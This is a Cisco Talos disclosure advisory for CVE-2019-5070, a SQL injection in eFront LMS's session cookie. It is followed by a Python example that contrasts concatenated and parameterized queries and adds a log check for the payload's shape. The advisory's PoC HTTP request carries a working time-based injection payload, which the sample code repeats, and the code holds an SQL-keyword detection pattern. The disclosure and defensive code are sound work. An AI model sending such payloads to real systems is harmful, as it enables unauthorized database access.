CVE-2019-5070: TALOS-2019-0859 || Cisco Talos Intelligence Group
Summary
An exploitable SQL injection vulnerability exists in the unauthenticated portion of eFront LMS, versions v5.2.12 and earlier. A specially crafted web request to the login page can cause SQL injection, resulting in data compromise. An attacker can use a browser to trigger these vulnerabilities, and no special tools are required.
Tested Versions
Epignosis eFront LMS v5.2.12
Product URLs
https://www.efrontlearning.com/
CVSSv3 Score
6.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
CWE
CWE-89: Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’)
Details
The following parameters are vulnerable to unauthenticated SQL injection attacks:
PHPSessionID parameter:
GET / HTTP/1.1
Host: [IP]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: PHPSESSIDfb411=aaaaaaaaa%00'[SQL INJECTION]
Upgrade-Insecure-Requests: 1
PoC:
GET / HTTP/1.1
Host: [IP]
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: PHPSESSIDfb411=bbbbbb%00' AND (SELECT 1 FROM (SELECT(SLEEP(8)))a) AND '1'='1
Upgrade-Insecure-Requests: 1
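The root cause described above is a session cookie value that reaches an SQL statement without being bound as a parameter. The following Python example is added here and is not Talos's or eFront's code: it uses a constructed sqlite3 session table (an assumption, since the advisory shows no schema) to contrast a concatenated lookup with a parameterized one using the advisory's own cookie value, and adds a small log check that flags the shape of that cookie (NUL byte, non-session characters, SQL keywords) in a Cookie header. The header names, session-id character set and sample lines are assumptions, not taken from the product.

```python
import re
import sqlite3
from urllib.parse import unquote

# --- Part 1: why splicing the cookie into the statement is the bug ----------

def build_db():
    """Constructed stand-in for a session store (assumption: the advisory
    does not show eFront's real schema or query)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE sessions (id TEXT PRIMARY KEY, user TEXT)")
    db.execute("INSERT INTO sessions VALUES ('legit-session', 'alice')")
    return db

def lookup_vulnerable(db, session_id):
    """Unsafe pattern: the raw cookie value is concatenated into the SQL text,
    so quotes, NUL bytes and keywords inside it are parsed as SQL."""
    sql = f"SELECT user FROM sessions WHERE id = '{session_id}'"
    try:
        row = db.execute(sql).fetchone()
    except (sqlite3.Error, ValueError) as exc:
        # A NUL in the query text is rejected by the driver (the exception
        # class differs between Python versions); either way the untrusted
        # bytes reached the SQL layer, which is the defect.
        return ("error", type(exc).__name__)
    return ("ok", row[0] if row else None)

def lookup_safe(db, session_id):
    """Hardened pattern: a bound parameter is only ever compared as data."""
    row = db.execute("SELECT user FROM sessions WHERE id = ?",
                     (session_id,)).fetchone()
    return ("ok", row[0] if row else None)

# --- Part 2: spotting the advisory's payload shape in request logs ----------

# Assumed shape of a PHP session id: alphanumerics, comma and hyphen only.
SESSION_VALUE_RE = re.compile(r"^[A-Za-z0-9,-]*$")
SQL_KEYWORD_RE = re.compile(r"\b(select|union|sleep|benchmark)\b", re.IGNORECASE)

def cookie_findings(cookie_header, name_prefix="PHPSESSID"):
    """Return the reasons a Cookie header line looks like this attack;
    an empty list means nothing suspicious was seen."""
    _, _, raw = cookie_header.partition(":")
    reasons = []
    for pair in raw.strip().split(";"):
        name, _, value = pair.strip().partition("=")
        if not name.startswith(name_prefix):
            continue
        if "%00" in value or "\x00" in value:
            reasons.append("nul_byte")
        decoded = unquote(value)
        if not SESSION_VALUE_RE.match(decoded):
            reasons.append("non_session_charset")
        if SQL_KEYWORD_RE.search(decoded):
            reasons.append("sql_keyword")
    return reasons

# Constructed sample headers: one benign, one carrying the advisory's PoC value.
BENIGN = "Cookie: PHPSESSIDfb411=k2j4h5g6f7d8s9a0; lang=en"
POC = ("Cookie: PHPSESSIDfb411=bbbbbb%00' AND "
       "(SELECT 1 FROM (SELECT(SLEEP(8)))a) AND '1'='1")
POC_VALUE = unquote(POC.split("=", 1)[1])   # decoded cookie value with the NUL byte
# The PoC's trailing AND '1'='1 applied to a real id: still matches when concatenated.
TAIL_ON_REAL_ID = "legit-session' AND '1'='1"

if __name__ == "__main__":
    db = build_db()
    print(lookup_vulnerable(db, TAIL_ON_REAL_ID), lookup_safe(db, TAIL_ON_REAL_ID))
    print(lookup_vulnerable(db, POC_VALUE), lookup_safe(db, POC_VALUE))
    print(cookie_findings(BENIGN), cookie_findings(POC))
```

With concatenation, the value `legit-session' AND '1'='1` still resolves to alice because the quote closes the literal and the rest is parsed as SQL; with a bound parameter the same string is just an id that does not exist. The PoC value itself produces a driver or syntax error under concatenation (the bytes reached the parser) and a plain "no such session" under binding. The log check is deliberately narrow: a real session id never contains a NUL byte, a quote or `SELECT`, so any of the three findings on a session cookie is worth an alert.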
Timeline
2019-07-29 - Vendor disclosure
2019-07-31 - Vendor acknowledged issues under review
2019-08-13 - Vendor acknowledged work to fix issues & testing
2019-08-30 - Vendor patched/released new version
2019-09-03 - Public disclosure